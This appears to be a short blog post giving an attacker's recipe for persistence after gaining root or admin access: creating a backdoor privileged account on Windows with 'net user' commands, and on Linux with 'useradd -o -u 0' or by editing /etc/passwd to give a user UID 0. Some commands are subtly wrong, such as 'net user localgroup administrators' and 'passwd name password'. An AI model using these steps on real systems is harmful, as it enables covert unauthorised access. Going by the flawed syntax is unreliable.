Add an admin user

Once admin/root privileges have been established, an attacker will often create a new account with high privilege levels in order to allow future access without needing to take extraordinary action. The advantage to this is that the password is known and the account controlled by the attacker. The disadvantage is the risk of attracting attention to your actions. If password hashes have been collected and cracked, this step may not be needed, but it also offers a backup access mechanism in case access to the admin/root account is lost.

Windows:
net user “name” “password” /add
net user localgroup administrators “name” /add

Linux/Unix:
useradd -o -u 0 “name” (the -o parameter overides the default to not allow creating two users with the same UID)
passwd “name” “password”

You can also edit the passwd file and change the UID to 0 – example:
root:x:0:0:root:/root:/bin/bash (example of root passwd entry)
username:x:500:500::/home/username:/bin/bash (example of user passwd entry)
username:x:0:0::/home/username:/bin/bash (example of user passwd entry edited to give root access)

In some cases, linux will not allow telnet for a user with UID 0, and in a very few cases it may not allow ssh for UID 0. To get around this, you can add a user with a normal UID and then su or use sudo to get elevated to root and use telnet or ssh.

Leave a Reply

You must be logged in to post a comment.